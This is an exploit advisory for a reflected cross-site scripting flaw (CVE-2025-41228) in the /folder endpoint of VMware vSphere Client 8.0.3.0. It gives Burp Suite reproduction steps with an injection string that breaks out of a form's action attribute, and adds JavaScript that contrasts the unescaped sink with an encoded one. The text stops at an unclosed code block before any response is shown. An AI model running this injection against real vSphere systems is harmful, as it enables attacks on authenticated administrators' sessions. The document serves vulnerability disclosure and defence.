# VMware vSphere Client 8.0.3.0 - Reflected Cross-Site Scripting (XSS)
- **Exploit Title**: VMware vSphere Client 8.0.3.0 - Reflected Cross-Site Scripting (XSS)
- **Date**: 2025-08-08
- **Exploit Author**: Imraan Khan (Lich-Sec)
- **Vendor Homepage**: [https://www.vmware.com](https://www.vmware.com)
- **Version**: vSphere Client 8.0.3.0
- **Tested On**: Web interface (Chrome 138)
- **CVE**: CVE-2025-41228
- **Category**: WebApps
---
## Description
A reflected Cross-Site Scripting (XSS) vulnerability exists in VMware vSphere Client version 8.0.3.0. The application fails to sanitize input passed via a query string to the `/folder` endpoint, resulting in arbitrary JavaScript execution when the reflected value is rendered into an HTML form’s `action` attribute.

The vulnerability was confirmed by intercepting a request through Burp Suite and injecting a malicious payload. This XSS only successfully executes when the response is rendered by a browser within an **active session**, such as one initiated via prior authentication.
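
The sink described above, as an added example that is not VMware's code or the exploit author's: a hypothetical template writes the query string into a form's `action` attribute, first raw and then encoded for the attribute context, and a small check shows whether the value stayed inside the attribute. The function names and form markup are assumptions; the input is the marker string from the request in step 2.

```javascript
// Added example (not VMware code): the reflection sink described above,
// modelled as a hypothetical server-side template, next to an encoded version.

// Characters that must be encoded inside a double-quoted HTML attribute value.
const ATTR_ESCAPES = { '&': '&amp;', '"': '&quot;', "'": '&#39;', '<': '&lt;', '>': '&gt;' };

function escapeHtmlAttr(value) {
  return String(value).replace(/[&"'<>]/g, (ch) => ATTR_ESCAPES[ch]);
}

// Vulnerable shape: raw query string concatenated into action="...".
function renderFormVulnerable(rawQuery) {
  return `<form method="post" action="/folder?${rawQuery}">`;
}

// Hardened shape: same markup, value encoded for the attribute context.
function renderFormHardened(rawQuery) {
  return `<form method="post" action="/folder?${escapeHtmlAttr(rawQuery)}">`;
}

// Minimal model of what a browser takes as the action value: everything up to
// the first literal double quote, then entity-decoded (&amp; last, so an
// encoded ampersand is not decoded twice).
function parsedAction(html) {
  const m = /action="([^"]*)"/.exec(html);
  if (!m) return null;
  return m[1]
    .replace(/&quot;/g, '"').replace(/&#39;/g, "'")
    .replace(/&lt;/g, '<').replace(/&gt;/g, '>').replace(/&amp;/g, '&');
}

// True when the reflected value stayed inside the attribute it was written to.
function staysInAttribute(html, rawQuery) {
  return parsedAction(html) === `/folder?${rawQuery}`;
}

// The marker string from step 2 of this page, used as constructed test input.
const SAMPLE_QUERY = 'ht7j4">tnkav=1';

for (const render of [renderFormVulnerable, renderFormHardened]) {
  const html = render(SAMPLE_QUERY);
  console.log(render.name, html, 'contained:', staysInAttribute(html, SAMPLE_QUERY));
}
```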

---
## Steps to Reproduce
### 1. Initiate request to vulnerable endpoint
Open a browser and navigate to:
```
https://host/folder?ht7j4
```
This sends a benign request that you will intercept.

---
### 2. Intercept and modify the request using Burp Suite
With Burp Suite proxy enabled, capture the request and modify the query string to inject the XSS payload:
```
GET /folder?ht7j4">tnkav=1 HTTP/2
Host: 192.168.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Referer: https://192.168.x.x/
Accept: text/html,application/xhtml+xml
```
Then forward the request to the server.

---
### 3. Observe the reflected payload in the HTTP response
In the Burp HTTP Response, the payload appears unencoded within the HTML:
```html